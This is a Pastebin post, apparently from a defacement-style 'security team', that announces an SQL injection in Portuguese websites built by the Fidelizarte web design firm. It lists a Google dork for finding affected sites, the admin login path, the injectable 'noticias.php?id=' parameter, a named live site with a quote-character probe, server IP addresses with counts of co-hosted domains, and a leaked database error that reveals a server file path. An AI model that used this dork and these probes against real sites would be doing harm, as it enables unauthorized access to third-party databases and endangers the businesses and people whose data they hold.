KingSkrupellos

Desenvolvido por Fidelizarte Web Design Portugal SQL Inj

Jan 14th, 2019
53
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.59 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Desenvolvido por Fidelizarte Web Design Portugal SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 15/01/2019
  7. # Vendor Homepage : fidelizarte.pt
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Desenvolvido por Fidelizarte'' site:pt
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14.  
  15. ####################################################################
  16.  
  17. # Admin Panel Login Path :
  18. *************************
  19. /admin/
  20.  
  21. # SQL Injection Exploit :
  22. ***********************
  23.  
  24. /noticias.php?id=[SQL Injection]
  25.  
  26. ###################################################################
  27.  
  28. # Example Vulnerable Site :
  29. *************************
  30.  
  31. [+] jetexpress.pt/noticias.php?id=2%27 =>
  32.  
  33. [ Proof of Concept ] => archive.is/ysmky
  34.  
  35. Note : (185.15.22.176) => There are 112 domains hosted on this server.
  36.  
  37. Note : (185.15.22.148) => There are 36 domains hosted on this server.
  38.  
  39. ####################################################################
  40.  
  41. # SQL Database Error :
  42. **********************
  43.  
  44. Fatal error: Call to a member function fetchAll() on a non-object in
  45.  
  46. /home/jetexpre/public_html/noticias.php on line 139
  47.  
  48. ####################################################################
  49.  
  50. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  51.  
  52. ####################################################################
Add Comment
Please, Sign In to add comment